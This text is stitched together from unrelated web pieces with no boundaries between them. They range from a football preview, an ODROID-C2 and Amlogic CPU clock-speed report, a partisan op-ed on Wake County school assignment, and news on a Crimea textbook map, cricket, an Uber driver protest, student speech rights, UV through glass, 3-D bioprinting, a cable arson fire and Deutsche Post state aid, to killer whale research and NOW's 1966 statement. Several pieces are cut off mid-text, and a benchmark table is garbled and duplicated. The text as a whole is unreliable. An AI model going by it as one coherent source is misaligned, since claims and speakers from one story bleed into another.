Thomas Tuchel has to bed in no fewer than eight new signings, having lost three absolutely key players from the season just gone, all while fighting on three incredibly competitive fronts. However, nobody expected him to push quite so far on all fronts as he did last season – a Europa League quarter final, a distant push for a title which was still mathematically possible until the final day and a slightly unfortunate DFB-Pokal final defeat on penalties. But Luca remains optimistic about Dortmund's future; “should they find their form and the youngsters develop accordingly, Dortmund might have a shot at silverware at some point, but beating Bavaria will always remain incredibly tough.”
In spite of cautious words from Dortmund fans, including but not limited to Luca, the immediate future looks bright for Dortmund. The long term future? Well, that looks even brighter.
Follow Luca on Twitter: @LucaGierl
Listen to the Yellow Wall Podcast: http://www.tyw.bundesligalounge.com/
Read his articles: http://www.tyw.bundesligalounge.com/?author=5
[su_label] Post editor: Ryan[/su_label]
When I compared the performance Amlogic S905 and Rockchip RK3368 processors last year, I noticed Amlogic S905 single thread performance not being much faster than the one of Rockchip RK3368, despite the former allegedly clocked at 2.0 GHz against the latter 1.2 GHz. But early this month one member (koschi) on ODROID forums started a thread entitled “No performance difference between 1.5, 1.75 & 2GHz” about ODROID-C2 board.
The first post link to Ant-computing website about choosing a processor for a build farm, and one of the tables comparing various ARM and x86 processors with the claim that Amlogic S905 was listed to 1.536 GHz, because “the device claims to run at 2.016 GHz but the kernel silently ignores frequencies above 1.536 GHz!”
So koschi did his own tests with 7z and sysbench, using cpufreq-set -u $FREQ to set a fixed frequency between test, and could confirm the issue:
7z b, total MIPS kHZ MIPS 100000 221 250000 605 500000 1252 1000000 2488 1296000 3182 1536000 3705 1752000 3691 2016000 3682 avg. of 3 x sysbench --num-threads=4 --test=cpu run kHZ seconds @4threads seconds @1threads 1 2 3 4 5 6 7 8 9 10 11 12 13 7z b , total MIPS kHZ MIPS 100000 221 250000 605 500000 1252 1000000 2488 1296000 3182 1536000 3705 1752000 3691 2016000 3682 avg . of 3 x sysbench -- num - threads = 4 -- test = cpu run kHZ seconds @ 4threads seconds @ 1threads
So it looks like Amlogic is cheating with the frequencies, and anything above 1.536 GHz does not change the results… There have been many comments in the thread with others confirming the issue. Hardkernel investigated the issue, and the answer while truthful is disappointing:
Please don't waste your valuable time.
All the Coretex-A53 based Amlogic SoCs have the same issue. S905, S905 Rev-C(S905H), S905X and even S912.
The kernel clock frequency 1.75 and 2Ghz do not exist in the BL3x blobs.
It must be Amlogic's fault. But we should detect it earlier in our internal development stage. Really sorry about that mistake. We've been modifying/testing the BL3x code to find a maximum feasible/stable clocks like 1.53Ghz, 1.58Ghz, 1.61Ghz, 1.65Ghz, 1.68Ghz, 1.71Ghz, etc for a couple of weeks.
But 1.65Ghz seems to be the maximum one due to some power and heat issues. We will run the burnA53 on Ubuntu and the Stress app on Android with 10 set of C2 boards in this weekend (for 48 hours stability test) to make sure it.
Once we will have a test result, we will report it on this thread with update package for further sampling test in early next week. If we disable two cores, the SoC can run up to 1.75Ghz probably. But we need further stability test too.
And yes. I fully agree most people don't like this approach. Anyway, we know well 1.65Ghz or 1.75Ghz is still very far from the 2Ghz. So we will change the C2 specification in our home page next week as per the test result.
And we must consider some compensation for C2 users. But we need to check what we can do first. Please accept my sincere apologies for the mistake and kindly understand our situation.
The only good news is that the limit might not be 1.5 GHz, and possibly closer to 1.7 GHz, with the final number pending Hardkernel burn-in test results. That issue will not only affect ODROID boards, but also any other devices based on Amlogic S905, S905X, and S912 processors.
Thanks to Tim for the tip.
“Segregation.”
It's a powerful word because it evokes powerful feelings. Hearing the word “segregation” instills in our minds images of violence, exclusion, and a bitter hatred of innocent men for no reason beyond the color of their skin. We remember a time when little boys and girls couldn't ride the bus together or sit at the same lunch table for fear of being shouted down, bullied, or even arrested. We know it represents a dark, evil, and unforgivable period in American history.
Or do we? Perhaps not, if we listen to local NAACP leader and spokesman Rev. William Barber, who was arrested today on charges of trespassing while screaming and pleading with fellow activists to rebel against the Wake County public schools' recent decision to resegregate. This would be a compelling tale of a brave man resisting police state oppression, if he were correct that the schools are resegregating at all. Unfortunately for the good reverend's cause, they are not.
Actually, the Wake County School Board is relaxing government controls that previously forced students to attend schools far away from their homes based only on their parents' socioeconomic status. The bizarre and somewhat authoritarian policy of redistributing thousands of students to new schools every year, which encumbered students' social development and caused abnormally long bus rides, was created with the intention of improving school performance through increased racial diversity. It is unclear whether there was any reason at the time to believe that racial diversity would cause students or teachers to become smarter. However, it is abundantly clear now that the plan has not worked. In 2007-2008, an abysmal 18% of Wake County public schools met the already lax standards of adequate yearly progress under No Child Left Behind. That is not the mark of a successful government program.
Now the School Board has voted to eliminate much of the harsh policies that forced redistributing students across great distances, instead focusing its efforts on neighborhood schools to avoid long bus rides. The obvious benefits of this are multi-faceted and substantial. Consumption of gasoline will decline, providing schools with a small but precious way to save money in a time of across-the-board budget cuts. Carbon emissions will be slashed, as well. Most importantly, parents will have greater choice in where to send their children to school, and children will enjoy shorter bus rides and a more stable base of friends as they can attend the same school year after year, if, of course, that is what they want.
The School Board's decision is an invaluable step forward in the movement to put parents back in charge of how their children are raised. The emotional issue of racial segregation is a fraud, a scapegoat set up to distract debate away from the real issue of school choice and throw advocates of freedom into an un-winnable game while busy-body school assignment officials try to retain some semblance of usefulness. Concerned parents cannot defend themselves against the accusation of being racist because the accusation is made without evidence, and therefore cannot be refuted with evidence. What they can do – and what we all must do – is stood our ground and never waiver in asserting our right to choice and freedom, not long bus rides and bureaucratic control.
If you liked this post, please feel free to share it on your Twitter or Facebook page. You may also like News and Observer Publishes Excruciatingly Stupid Article – Reveals Total Disconnect from Rational People and the Internet. You can also check out the index page for more from the Worst-Case Scenario!
Advertisements
Image copyright Embassy of Ukraine Image caption The original textbook (left) showed Crimea a different colour from Ukraine
A geography textbook that prompted a complaint from the Ukrainian embassy for showing Crimea as part of Russia has been changed.
Oxford University Press (OUP) was criticised for descriptions and maps of the peninsula in its Geog.3 title.
Now the publisher has said following feedback from customers its updated textbook "explains the situation in Crimea in more detail".
The Ukrainian embassy said OUP has "corrected its serious mistakes".
The earlier version of the textbook, which is aimed at pupils studying Key Stage 3 and was withdrawn from sale in October, said Russia "took [Crimea] from Ukraine in 2014".
It showed the territory as a different colour from Ukraine on maps and noted that its citizens "voted for it to become part of Russia".
'A grave mistake'
But in a letter sent last year Ukrainian diplomat Igor Kyzym described the vote as a "sham" that "has never been recognised by the international community".
He added that the textbook "misleads" students and the descriptions of Crimea were "a grave mistake by the editors".
In a statement on its website the Ukrainian embassy said the new version "points out that under international law Crimea is part of Ukraine".
A spokesperson for Oxford University Press said the textbook now gives "more details about the events of 2014 and the reaction of the international community".
Kremlin-backed forces seized control of Crimea in 2014 after Ukraine's pro-Moscow president Viktor Yanukovych was driven from power.
The territory, which has a Russian-speaking majority, then voted to join Russia in a referendum that Ukraine and the West deem illegal.
Australia complete Test preparations in Galle
After tapping into Muthiah Muralidaran's spin bowling knowledge leading into the first Test in his home city of Kandy, the Australians have now sought insights from former South African speedster Allan Donald ahead of the vital second match in Galle.
Skipper Steve Smith, who today confirmed a solitary change to his Test XI with a like-for-like replacement of left-arm spinner Jon Holland for injured Stephen O'Keefe, said Donald's experience as bowling mentor to his former team has been invaluable over recent days.
Jon Holland, Australian Test cricketer No.444 in waiting // Getty
In particular, the wisdom that Donald – now working as interim fast bowling coach for Australia during this two-month Test and limited-overs tour – gleaned during his involvement in the Proteas' thumping Test win over Sri Lanka at Galle two years ago.
A 153-run victory that came in defiance of conventional wisdom about bowling on spin-conducive subcontinental pitches given it was orchestrated by South Africa's dual-pace attack of Dale Steyn and Morne Morkel who shared 16 of the 20 Sri Lankan wickets to fall.
Steyn's match figures of 9-99 were the best recorded by a fast bowler at the Galle International Cricket Stadium, which is buttressed by the imposing edifice of a 16th Century fort but also buffeted by strong winds howling in from the Laccadive Sea that crashes relentlessly into the island's south coast.
Quick Single: Steyn rips through Sri Lanka
And it was the way that South Africa's bowlers used the ball, as opposed to the misgivings they held about a Galle pitch that was as dry and slow as it is expected to be for the second Test starting here on Thursday, that proved the difference in that gruelling and controversial Test.
"There's always pace in the air," Steyn noted wryly at the end of that match in which Proteas' seamer Vernon Philander was fined 75 per cent of his match fee for 'intending' to alter the condition of the ball after television footage emerged of him scratching its surface.
Quick Single: Philander tamper sheds new light
It was the South Africans' ability to extract reverse swing once the new-ball sheen was lost that was a significant factor in the outcome.
And Donald spent almost an hour working with pace bowlers Mitchell Starc, Josh Hazlewood and Nathan Coulter-Nile during an extended centre wicket session during Australia's major pre-Test training run at Galle yesterday.
Donald and Starc at training // Getty
"He said the ball reversed quite significantly from both ends (in 2014)," Smith told reporters in the seaside city today as he recounted the insights that Donald brought to the Australians whose previous visit to Galle five years ago delivered their only Test win in Asia for the past decade.
"Morkel had it going away from the right handers and Steyn had it going into the right handers, so we've got Starc who can do (away swing to right handers) and Hazlewood can do (in swing).
"And Mitchell Marsh bowls good reverse swing as well, so we've got the bases covered, it's just about going out there and making sure we do the right things this Test match."
Smith expects that Sri Lanka will enter this Test, as they did in the series opener at Pallekele, with only two front line seamers.
Nuwan Pradeep has been given until the morning of the match to prove his fitness after suffering hamstring soreness. Should he be ruled out, 24-year-old left-arm seamer Vishwa Fernando is likely to make his Test debut.
Even though Sri Lanka were able to post a match winning second innings of 353 in the opening Test thanks almost entirely to Kusal Mendis's epic 176, Smith believes that Australia's fast bowling stocks remain a clear point of difference between the teams.
Pressure on Mendis to back up his Kandy effort // Getty
The fact that Australia's seamers accounted for four of Sri Lanka's top six batters in both innings at Pallekele adds credence to the Australia captain's theory, and the prospect of conventional swing with the new ball then reverse swing with the older one carries considerable appeal.
"It would be nice to see the ball reversing this game," Smith said after his quicks engaged in a lengthy session to familiarise themselves with the weather and pitch conditions.
Quick Single: Aussie spinners' time to shine
"They (Sri Lanka) are not going to have too many guys that are going to be able to reverse the ball, so I guess that's a point of difference.
"The guys we'll have playing (Starc, Hazlewood and Marsh) bowl good pace as well, and that also is a bit of a point of difference.
"Hopefully we can exploit that with their batters a little bit."
The other key element in South Africa's 2014 win at Galle was that the Proteas batters steeled themselves to bat for as long as possible in the first innings and squeeze every available run before the pitch became a haven for the home team's spinners.
After their skipper Hashim Amla won the toss, the Proteas batted for almost 170 overs before declaring at tea on the second day with a total of 9-455.
Quick Single: Lankan wizards ready to wreak havoc
It's a template, if not quite a tempo that Smith has urged his fellow batters to follow should the coin fall in his favour and he gains first use of a pitch that is bone dry and is expected to take spin from early in the Test.
"I think our first innings is going to be crucial," Smith said.
"It's going to get harder and harder to bat as the game goes on.
"Starting (an innings) is probably the hardest part in these conditions, it's just about making sure once you've got started you continue doing the same things and don't get complacent and just be willing to grind out and get a big score.
"You do that in the first innings then you set the game up."
Herath heroics too much for Australia
Looming large as obstacles to that aspiration are veteran Sri Lanka left-arm spinner Rangana Herath and rookie left-arm wrist spinner Lakshan Sandakan who – like Steyn and Morkel at Galle two years ago – shared 16 wickets in the first Test.
Smith believes that his team will be better equipped to cope with the previously unseen Sandakan now that they've had a chance to study him close up, and that the work they've undertaken facing left-arm finger spinners in the nets over recent days will help them counter Herath.
As self-evident as it sounds, a key to the latter will be ensuring the batters look to make contact with the ball where it is headed rather than where they believe it will be if it grips and turns.
Enter Sandakan: mystery spinner's stunning debut
Most of Herath's nine wickets at Pallekele were a result of players pushing forward thinking the ball would spin sharply from leg stump to off (for the right handers) only to find it going straight on, past the inside of the bat and on to the pad or the stumps.
"It's obviously different to batting against spin back home (in Australia), you can trust the bounce and trust what the ball's going to do," Smith said.
"Looking at the dismissals in the first Test match, the balls that skid on are generally not half volleys, they're generally pretty good length balls.
"In saying that, it's hard to sometimes distinguish which ball's going to skid and which ball's going to spin, so it's about trying to get the bowlers off their lengths as much as you can, and make them a little bit uncomfortable.
"But at the same time, if they do get in a good rhythm and you are playing from the crease, particularly against someone like Rangana, it's about playing for that ball that is going to skid on.
"If it spins and you nick one, so be it.
"But we didn't lose any wickets on the outside of the bat in the last Test match, so I think you can live with that."
Australia XI: Warner, Burns, Khawaja, Smith (c), Voges, M Marsh, Nevill (wk), Starc, Hazlewood, Holland, Lyon.
Maya Kosoff/Business Insider
On Monday morning, a group of New York City-based Uber drivers protested the company outside of its Long Island City, Queens office.
The protest was planned by a group of drivers known as the Uber Drivers Network NYC. The group's first protest happened last Monday at Uber's offices. The disgruntled drivers have been protesting against Uber policies.
Last week, Uber reversed a policy that made its Black Car and SUV drivers pick up less-lucrative Uber XL and Uber X customers. But drivers are still unhappy.
A group of about 60 protesters showed up around 10 a.m. on Monday for the protest, carrying signs and a megaphone. "I've been driving for Uber for two years, and when I started, I loved it," Uber driver Numan Tarik told Business Insider at the protest.
Maya Kosoff/Business Insider
Tarik says Uber's steep discounts, intended to give the company a competitive edge over competitors like Lyft and Gett, as well as yellow cabs, are hurting Uber drivers.
"Uber is charging us [drivers] 20% before they deduct New York sales tax. We have to get car washes daily, we get our cars detailed once a month, we get regular oil changes and pay for insurance." Tarik said. According to Uber, these are just suggestions for its drivers, and not a company policy. Tarik also drives for competing car companies. "You can't make a living working only for Uber."
Protesters carried signs saying "Uber X should not be cheaper than a taxi" and "Uber: the most valuable asset is the drivers."
NYPD officers brought in barricades to contain protesters. Maya Kosoff/Business Insider
The New York City Police Department also showed up for the protest. About six NYPD vehicles and a dozen officers were there to monitor the protest. NYPD blocked off access to 42 Road and monitored traffic on Jackson Avenue in front of Uber's offices.
Oris Fortuna has been an Uber X driver for four months. He told Business Insider he quit his old job because he thought Uber would be a more lucrative way to make money.
"Since Uber implemented the 20% off discount on all Uber rides, I've been losing $200 a week," Fortuna said. "To make up for it, you have to work 20% more. That means more mileage and more gas. An $8 trip is not worth it." Fortuna wants better representation for himself and other Uber drivers. "There's no union representing us, so we have to protest."
Maya Kosoff/Business Insider
Uber NYC's general manager Josh Mohrer was at the protest as well.
"We have, and have always had, an open-door policy with our drivers," Mohrer told Business Insider. "The majority of our drivers communicate with us. We're always happy to welcome them and talk to them."
Mohrer spoke to the journalists who had showed up to cover the protest, though he and the protesting Uber drivers didn't communicate.
The group has been planning its protests and meetings largely via Facebook. On Friday, the drivers held a meeting in Queens' Forest Park to meet face-to-face for the first time. Roughly 100 drivers showed up for the informational meeting, which started at 4 pm and went until 7:30, with Uber drivers individually voicing their concerns about the company.
"Uber wants us to have all these amenities — water bottles, mints for our customers — but they're cutting the prices. So how can I, as a professional driver, provide all of this?" asked Ajit Singh at Friday's meeting.
The Uber Drivers Network NYC group plans to continue protesting Uber at its offices.
Hilal Aissani, an Uber SUV driver, is unhappy with Uber because of what it tells customers about tipping their drivers. "Uber tells the customer that their tip for the driver is included, but it isn't," Aissani said at Monday's protest. "Drivers never see a dollar of that tip money." A blog post on Uber's website says that by default, 20% of the customer's fare is paid to the driver as a gratuity. This is the case for UberTAXI only, a feature allowing Uber customers to request a regular taxi through the app in some cities. According to its website, Uber says there is no need to tip with UberBLACK or UberX.
The following is a guest post by Will Creeley and Nico Perrino of the Foundation for Individual Rights in Education (FIRE). Creeley is FIRE's Director of Legal and Public Advocacy and Perrino is the Communications & Media Relations Coordinator.
Attention, high school and college students: Your online speech is not nearly as private as you think. And no, we're not talking about the National Security Agency. The threat to student speech comes from a far more local and immediate source: the prying eyes of school administrators apparently unaware of their students' rights. All too often, students face unwarranted punishment for online communications.
Examples abound.
Just this past May at Cicero-North Syracuse High School in upstate New York, senior Pat Brown was suspended for three days for creating a Twitter hashtag about a school budget controversy. Brown created the "#shitCNSshouldcut" hashtag to suggest ways his school could save money after voters rejected a $144.7 million budget plan, joking that laying off the school's principal or getting rid of the "anime club" might help alleviate budget strains. Unfortunately, the principal wasn't amused; CNN and The Huffington Post reported that Brown was accused of "harassing the principal" and "inciting a social media riot that disrupted the learning environment."
Also this past May, Heights High School (Wichita, Kansas) senior class president Wesley Teague was suspended and barred from attending graduation after posting a tweet that the school deemed offensive to HSS's student athletes. Teague wrote that "‘Heights U' is equivalent to WSU's football team," referring to the school's athletic program and nearby Wichita State University, which eliminated its football program in 1986. Teague was scheduled to give the commencement speech at graduation, but the school sent Teague and his parents a letter stating that Teague's initial tweet and a few subsequent tweets "acted to incite a disturbance" within school and "aggressively [disrespected] many athletes."
Depressingly, colleges aren't much better at respecting student speech rights online.
Last December, a student at Central Lakes College in Brainerd, Minnesota was expelled a semester before his graduation for comments he posted on his private Facebook page. Craig Keefe, who was studying to become a registered nurse, said he wasn't told what was wrong with his Facebook posts or how they violated the college's policies. In a meeting with school officials, Keefe was asked about one of his "disturbing" Facebook posts that used the phrase "stupid bitch" and another that complained about there "not being enough whiskey for anger management." A few days later he received a letter informing him of his expulsion for "behavior unbecoming of the profession and transgression of professional boundaries." Keefe has since filed a lawsuit alleging violations of his due process and free speech rights.
And last October, Montclair State University in New Jersey issued a no-contact order to graduate student Joseph Aziz in response to unflattering comments about another student he posted to a YouTube video that September. The no-contact order included a gag prohibiting him from posting "any social media regarding" the other student. After Aziz later posted comments about the matter to a private Facebook group, he was charged with harassment and disruptive conduct and suspended for the spring semester. Happily, the sanctions were rescinded after our organization, the nonpartisan, nonprofit Foundation for Individual Rights in Education (FIRE), wrote to the university pointing out that the gag order and punishment violated Aziz's First Amendment rights.
These examples make all too clear that administrators think that student expression loses First Amendment protections once it's available online. Thankfully, that's not the case; speech doesn't lose protection just because it's posted on the Internet.
Of course, the First Amendment only applies to government actors—in this context, public high schools and universities. (Private institutions aren't covered by the First Amendment, but some courts have found them to be contractually bound by the promises made to students in handbooks, codes of conduct, and other materials. Often, those promises include free speech.)
There's a difference between the speech rights afforded to public high school and public college students, too. The U.S. Supreme Court has held that public college students enjoy full First Amendment rights. In contrast, the Court has held that public high school administrators may regulate student speech that substantially disrupts school activities; that is "offensively lewd and indecent"; that the public would think bears the school's imprimatur; and that arguably promotes illegal drug use.
So the bottom line is that public college students are just as free as the rest of us to exercise their First Amendment right to express themselves, whether online or off. And even given the more limited speech rights possessed by public high school students, high school administrators can't punish student speech simply because it's posted on Twitter or Facebook. Indeed, recent federal court decisions have suggested sharp limits on administrators' ability to punish high school and grade school students for online speech posted by students outside of school grounds
It's important for students, administrators, and courts alike to recognize that technological advances need not come at the expense of expressive rights. Just because student speech is newly visible and accessible when posted online doesn't mean that administrators have increased power to police and punish it.
You may have heard you can't get a sunburn through glass, but that doesn't mean glass blocks all ultraviolet, or UV, light. The rays that lead to skin or eye damage still can get through, even if you don't get burned.
Types of Ultraviolet Light
The terms ultraviolet light and UV refer to a relatively large wavelength range between 400 nm and 100 nm. It falls between violet visible light and x-rays on the electromagnetic spectrum. UV is described as UVA, UVB, UVC, near ultraviolet, middle ultraviolet, and far ultraviolet, depending on its wavelength. UVC is completely absorbed by Earth's atmosphere, so it doesn't pose a risk to your health. UV light from the sun and man-made sources are mainly in the UVA and UVB range.
How Much UV Is Filtered by Glass?
Glass that is transparent to visible light absorbs nearly all UVB. This is the wavelength range that can cause a sunburn, so it's true you can't get a sunburn through glass.
However, UVA is much closer to the visible spectrum than UVB. About 75 percent of UVA passes through ordinary glass. UVA leads to skin damage and genetic mutations that can lead to cancer. Glass does not protect you from skin damage from the sun. It affects indoor plants too. Have you ever taken an indoor plant outside and burned its leaves? This happens because the plant was unaccustomed to the higher levels of UVA found outside, compared with inside a sunny window.
Do Coatings and Tints Protect Against UVA?
Sometimes glass is treated to protect against UVA. For example, most sunglasses made from glass are coated so they block both UVA and UVB. The laminated glass of automobile windshields offers some (not total) protection against UVA. Automotive glass used for side and rear windows ordinarily does not protect against UVA exposure. Similarly, the window glass used in homes and offices does not filter much UVA.
Tinting glass reduces the amount of both visible and UVA transmitted through it. Some UVA still gets through, though. On average, 60 percent to 70 percent of UVA still penetrates tinted glass.
Ultraviolet Light From Fluorescent Lighting
Fluorescent lights do emit UV light but usually not enough to cause a problem. In a fluorescent bulb, electricity excites a gas, which emits UV light. The inside of the bulb is coated with a fluorescent coating of phosphor that converts the ultraviolet light into visible light. Most of the UV produced by the process is either absorbed by the coating or else doesn't make it through the glass. Some UV does get through, but the UK Health Protection Agency has estimated that UV exposure from fluorescent bulbs is responsible for only about 3 percent of a person's exposure to ultraviolet light.
Your actual exposure depends on how close you sit to the light, the type of product that is used, and how long you are exposed. You can reduce exposure by increasing your distance from the fluorescent fixture or wearing sunscreen.
Halogen Lights and UV Exposure
Halogen lights release some ultraviolet light and usually are constructed of quartz because ordinary glass cannot withstand the heat produced when the gas reaches its incandescent temperature. Pure quartz does not filter UV, so there is a risk of UV exposure from halogen bulbs. Sometimes the lights are made using special high-temperature glass (which at least filters UVB) or doped quartz (to block UV). Sometimes halogen bulbs are encased inside glass. UV exposure from a pure quartz lamp can be reduced by using a diffuser (a lampshade) to spread out the light or increasing your distance from the bulb.
Ultraviolet Light and Black Lights
Black lights present a special situation. A black light is intended to transmit ultraviolet light rather than block it. Most of this light is UVA. Certain ultraviolet lamps transmit even more of the UV part of the spectrum. You can minimize the risk of damage from these lights by keeping your distance from the bulbs, limiting your exposure time, and avoiding looking at the lights. Most black lights sold for Halloween and parties are pretty safe.
The Bottom Line
Vital Signs is a monthly program bringing viewers health stories from around the world.
(CNN) -- The 21st century has seen the growth of 3-D printing, with well-known applications in architecture, manufacturing, engineering, and now increasingly in medicine.
The birth of 3-D scanning technologies combined with organic inks and thermoplastics has enabled the "bioprinting" of a range of human body parts to accommodate a wide range of medical conditions. Let's start form the top.
Skulls
Doctors at University Medical Center Utrecht, in Holland, have reported successfully performing the first surgery to completely replace a patient's skull with a tailor-made plastic version that was 3-D printed.
The patient had a chronic bone disorder that caused her skull to be 5cm thick. The hospital said the condition had caused her to lose her vision and ultimately would have killed her, but that three months after the operation the patient regained her vision and was able to return to work.
Eyes
Batch-printing of up to 150 prosthetic eyes an hour has become a reality according to UK-based company Fripp Design and Research. The mass-production technique promises to speed up the manufacture of eye prostheses and drive down the cost. Printing each eye with slight variation in color is intended to produce better aesthetic results.
The aim is to ensure more affordable eyes for the developing world with countries such as India reportedly showing interest in the products. The company, in collaboration with the UK's Manchester Metropolitan University, hopes to implement the use of its printed eyes within the next year.
Noses and Ears
Fripp Design has also collaborated with the University of Sheffield, in the United Kingdom, to produce facial prostheses such as ears and noses. 3-D facial scans of patients are used to print out prosthetics using pigments, starch powder and silicone for replica facial parts closely matching the patient's original nose or ear. The real benefit here is that once parts begin to wear, they can be re-ordered at a fraction of the cost as the technology and design will already be in place. The simpler process of scanning a patient's face, rather than more invasive face molds needed for traditional prostheses, also makes the process a lot more patient-friendly.
A team at Cornell University, in the United States, is doing things differently. It's printing 3-D molds of a patient's ear using ink gels containing living cells. The printed products are injected with bovine cartilage cells and rat collagen and incubated until they are ready three months later. Human transplants could be possible within three years, say researchers.
Read: Carpenter cuts off fingers, prints new ones
Synthetic Skin
James Yoo at the Wake Forest School of Medicine in the United States is developing a printer that will print skin straight onto the wounds of burn victims. The "ink" they're using consists of enzymes and collagen which once printed are layered with tissue cells and skin cells which combine to form the skin graft. The team plans on developing portable machines to print skin directly onto wounds in remote and war-torn settings.
The ideal synthetic skin graft needs to match the coloration of the patient as accurately as possible in order for the graft to look natural. Dr. Sophie Wuerger and her team at the University of Liverpool in the UK are working on using 3-D cameras, image processing and skin modeling to ensure the tone and texture of printed skin match up to the real thing.
Limbs
Thermoplastics have led the way in the growth of printable hands, arms and even individual fingers. Richard Van As is one of those producing affordable hand and finger prostheses with his company Robohand, based in South Africa. The team is creating functional fingers for use on amputated hands by combining the printing of the thermoplastic polylactide with aluminum and stainless steel digits to create a functioning mechanical finger.
Robohand recently collaborated with U.S. entrepreneur Mike Ebeling on a project providing affordable printed arms to war amputees in Sudan. The collaboration is known as "Project Daniel," named after 14 year-old Daniel Omar who lost both his hands and part of his arms after a bomb was dropped near his family home in Sudan's Nuba mountains. The team is enabling Robohands to reach the masses at costs as small as $100 for a basic hand.
Bones
One of the more established fields of 3-D printing is the bioprinting of human bone implants, and now replacement bones.
In 2011, researchers at Washington State University announced they had printed a bone-like structure that acts as a scaffold for new bone cells to grow on, before it degrades. The structure was printed using calcium phosphate and has been successfully tested in animals. The hope is to print customized grafts for use in patients with bone fractures.
Read: 3-D printed arm gives hope to boy maimed by bomb
Read: Robot exoskeleton lets girl lift her arms
Read: Lungs on a chip and 3-D printed hearts
Image caption Damage to the cables caused a fire in an underpass and led to part of the motorway being closed
Police have said power cables were "deliberately" set on fire, closing the M8 motorway near Glasgow for four hours and leaving 50,000 homes in darkness.
Scottish Power said "malicious damage" to high-voltage cables caused the blaze in an underpass which led to the M8 near Braehead being shut on Monday.
The power company said it could not rule out cable theft as a reason for the damage.
Police said it was an "incredibly dangerous" thing to do.
Police and fire crews, along with electricity and gas engineers, were called to the blaze involving two high-voltage cables in an underpass on the A8 at about 20:30 on Monday.
The M8 motorway was shut between junctions 25 for the Clyde Tunnel and 27 at Arkleston after smoke blew across the road.
The road was reopened shortly after 01:00 on Tuesday.
The nearby A8 remained closed for a longer period and train services in the area were also affected.
All of our equipment appeared to be in good working order, which may suggest third-party interference Guy Jefferson, Scottish Power Energy Networks
Following an investigation by the fire service, Strathclyde Police said they were treating the cable blaze as deliberate.
Det Sgt Gordon McCrae said: "It would appear that the electrical cables in the disused underpass were set alight which resulted in damage and disruption.
"Why they have been set on fire has still to be established but it was an incredibly dangerous and very selfish thing to do.
"Not only did it cause a tremendous inconvenience and substantial cost, it put lives in danger."
Det Sgt McCrae said he knew the underpass was in use as there was fresh graffiti on the walls, and he urged anyone with information about the fire to come forward.
Scottish Power said about 50,000 homes and businesses were affected by power cuts, with the majority reconnected within 30 minutes.
The company was assessing the scale of the damage to the cables and said major repairs would be required.
Guy Jefferson, from Scottish Power Energy Networks, said: "We are working closely with the police and the fire brigade who are investigating the cause of the fire.
"All of our equipment appeared to be in good working order, which may suggest third-party interference.
"Our engineers worked flat out to get power restored to homes as quickly as they possibly could. We will continue to monitor it closely until full repairs can be carried out."
A Deutche Post sign adorns the Bonn Post Tower, the headquarters of German postal and logistics group Deutsche Post DHL in Bonn March 11, 2015. REUTERS/Wolfgang Rattay
BRUSSELS (Reuters) - The European Court of Justice ruled on Wednesday that Germany had breached EU law in providing state aid to Deutsche Post (DPWGn.DE) as it had not sufficiently taken into account the business-to-business parcel delivery market.
The European Commission in 2012 ordered Germany to recover from Deutsche Post incompatible aid granted since 2003 of between 500 million euros and 1 billion euro (370 million-0.74 billion pounds) from a combination of high regulated prices and pension relief subsidies.
In 2013, the Commission took Germany to court for failure to recover this aid, which it said had given Deutsche Post an unfair advantage over its competitors.
From barks to gobbles, the sounds that most animals use to communicate are innate, not learned. However, a few species, including humans, can imitate new sounds and use them in appropriate social contexts. This ability, known as vocal learning, is one of the underpinnings of language.
Vocal learning has also been observed in bats, some birds, and cetaceans, a group that includes whales and dolphins. But while avian researchers have characterized vocal learning in songbirds down to specific neural pathways, studying the trait in large marine animals has presented more of a challenge.
Now, University of San Diego graduate student Whitney Musser and Hubbs-SeaWorld Research Institute senior research scientist Dr. Ann Bowles have found that killer whales (Orcinus orca) can engage in cross-species vocal learning: when socialized with bottlenose dolphins, they shifted the types of sounds they made to more closely match their social partners. The results, published in The Journal of the Acoustical Society of America, suggest that vocal imitation may facilitate social interactions in cetaceans.
Killer whales have complex vocal repertoires made up of clicks, whistles and pulsed calls -- repeated brief bursts of sound punctuated with silence. The acoustic features of these vocalizations, such as their duration, pitch and pulse pattern, vary across social groups. Whales that are closely related or live together produce similar pulsed calls that carry vocal characteristics distinct to the group, known as a dialect.
"There's been an idea for a long time that killer whales learn their dialect, but it isn't enough to say they all have different dialects so therefore they learn. There needs to be some experimental proof so you can say how well they learn and what context promotes learning," said Bowles.
Testing vocal learning ability in social mammals usually requires observing the animal in a novel social situation, one that might stimulate them to communicate in new ways. Bottlenose dolphins provide a useful comparison species in this respect: they make generally similar sounds but produce them in different proportions, relying more on clicks and whistles than the pulsed calls that dominate killer whale communication.
"We had a perfect opportunity because historically, some killer whales have been held with bottlenose dolphins," said Bowles. By comparing old recordings of vocalization patterns from the cross-socialized subjects with recordings of killer whales and bottlenose dolphins housed in same-species groups, Bowles and her team were able to evaluate the degree to which killer whales learned vocalization patterns from their cross-species social partners.
All three killer whales that had been housed with dolphins for several years shifted the proportions of different call types in their repertoire to more closely match the distribution found in dolphins -- they produced more clicks and whistles and fewer pulsed calls. The researchers also found evidence that killer whales can learn completely new sounds: one killer whale that was living with dolphins at the time of the experiment learned to produce a chirp sequence that human caretakers had taught to her dolphin pool-mates before she was introduced to them.
Vocal learning skills alone don't necessarily mean that killer whales have language in the same way that humans do. However, they do indicate a high level of neural plasticity, the ability to change circuits in the brain to incorporate new information. "Killer whales seem to be really motivated to match the features of their social partners," said Bowles, though the adaptive significance of the behavior is not yet known.
There are immediate reasons to study the vocal patterns of cetaceans: these marine mammals are threatened by human activities through competition for fishery resources, entanglement in fishing gear, collisions with vessels, exposure to pollutants and oil spills and, ultimately, shrinking habitats due to anthropogenic climate change. If their social bonds are closely linked to their vocalizations, killer whales' ability to survive amidst shifting territories and social groups may be tied to their ability to adapt their communication strategies.
"It's important to understand how they acquire [their vocalization patterns], and lifelong, to what degree they can change it, because there are a number of different [cetacean] populations on the decline right now," said Bowles. "And where killer whales go, we can expect other small whale species to go -- it's a broader question."
The National Organization for Women's 1966 Statement of Purpose
Printable PDF
NOTICE: This is a historic document, which was adopted at NOW's first National Conference in Washington, D.C. on October 29, 1966. The words are those of the 1960s, and do not reflect current language or NOW's current priorities. To read NOW's current Statement of Purpose, please refer to our bylaws.
We, men and women who hereby constitute ourselves as the National Organization for Women, believe that the time has come for a new movement toward true equality for all women in America, and toward a fully equal partnership of the sexes, as part of the world-wide revolution of human rights now taking place within and beyond our national borders.
The purpose of NOW is to take action to bring women into full participation in the mainstream of American society now, exercising all the privileges and responsibilities thereof in truly equal partnership with men.
